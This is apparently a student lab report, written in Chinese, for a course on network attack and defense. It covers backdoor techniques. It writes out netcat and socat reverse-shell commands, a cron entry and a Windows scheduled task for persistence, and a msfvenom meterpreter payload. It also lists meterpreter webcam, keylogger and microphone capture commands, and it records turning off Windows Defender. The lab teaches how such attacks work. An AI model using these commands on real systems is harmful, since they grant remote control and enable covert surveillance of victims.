2018-2019-2 20165219《網絡對抗技術》Exp2 後門原理與實踐

2018-2019-2 20165219《網絡對抗技術》Exp2 後門原理與實踐

實驗內容

使用netcat獲取主機操做Shell，cron啓動

使用Socat獲取主機操做Shell, 任務計劃啓動

使用MSF meterpreter（或其餘軟件）生成可執行文件，利用ncat或socat傳送到主機並運行獲取主機Shell

使用MSF meterpreter（或其餘軟件）生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容，並嘗試提權

經常使用後門工具

Netcat參考資料

Socat參考資料

基礎問題

例舉你能想到的一個後門進入到你係統中的可能方式？

答：收到虛假郵件，下載郵件的附件

例舉你知道的後門如何啓動起來(win及linux)的方式？

答：經過修改註冊表設置爲開機自啓動；進入掛馬網站

Meterpreter有哪些給你映像深入的功能？

答：開啓攝像頭，錄製音頻等操做。

如何發現本身有系統有沒有被安裝後門？

答：開啓防火牆；下載專業的殺毒軟件

實驗過程

一 windows下得到一個linux shell

1 在Linux中使用ifconfig查看Linux的ip地址

2 在Windows中使用ipconfig查看本機ip地址

3 windowsncatexe -l -p 5219打開監聽，Linuxnc ip 5219 -e /bin/sh反彈鏈接win，而且在Windows cmd查看是否成功

二 Linux 下得到Windows的cmd程序

1 Linux運行監聽指令nc -l -p 5219

2 Windows反彈鏈接Linuxncat.exe -e cmd.exe ip 5219

3 在Linux shell下使用dir命令

三 在Linux與Windows之間進行數據傳送

1 在windows下輸入命令：ncat.exe -l 5219，實現監聽5219端口

2 Kali下輸入ncat ip，鏈接到windows端口

四使用netcat獲取主機操做Shell，cron啓動

1 windows端下，輸入命令ncat.exe -l -p 5219，監聽本機的5219端口

2 kali端下，輸入crontab -e，實現編輯一條定時任務。

3 插入* * * * /bin/netcat ip -e /bin/sh

4 保存退出，crontab -l查看

五 使用socat獲取主機操做Shell, 任務計劃啓動

1 win10系統中鼠標右擊計算機：計算機管理->系統工具->任務計劃程序->建立任務

2 填寫任務名稱：20165219

3 新建觸發器

4 新建操做

5 導入socat.exe的路徑，並添加參數：tcp-listen:5219 exec:cmd.exe,pty,stderr(把cmd.exe綁定到端口5219，同時把cmd.exe的stderr重定向到stdout上)

6 鎖定計算機，再次打開，運行任務。

7 在Linux shell中輸入socat - tcp:ip:5219

六 使用MSF meterpreter（或其餘軟件）生成可執行文件，利用ncat或socat傳送到主機並運行獲取主機Shell

1 kali中輸入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=5219 -f exe > 20165219_backdoor.exe

2 Windows中使用ncat.exe -lv5219 > 20165219_backdoor.exe

3 Linux中輸入nc ip < 20165219_backdoor.exe
在ncat文件夾下查看

4 使用msfconsole進入msf控制檯

5 進行一系列的設置

6 運行後門程序

七 使用MSF meterpreter（或其餘軟件）生成獲取目標主機音頻、攝像頭、擊鍵記錄等內容，並嘗試提權

1webcam_snap能夠使用攝像頭拍照

2 使用creenshot能夠進行截屏

3 keyscan_start 記錄下擊鍵的過程

4 record_mic能夠截獲一段音頻

八 遇到的問題

運行後門程序的時候， cMd拒絕訪問，雙擊文件也不能夠運行，關掉防火牆也不行 。

解決：把win10 控制面板中的 windows defender安全中心中的病毒威脅和防禦功能關掉

九 實驗體會

經過此次實驗明白了後門的原理。同時也加強了安全防禦的意識，實驗內容頗有趣。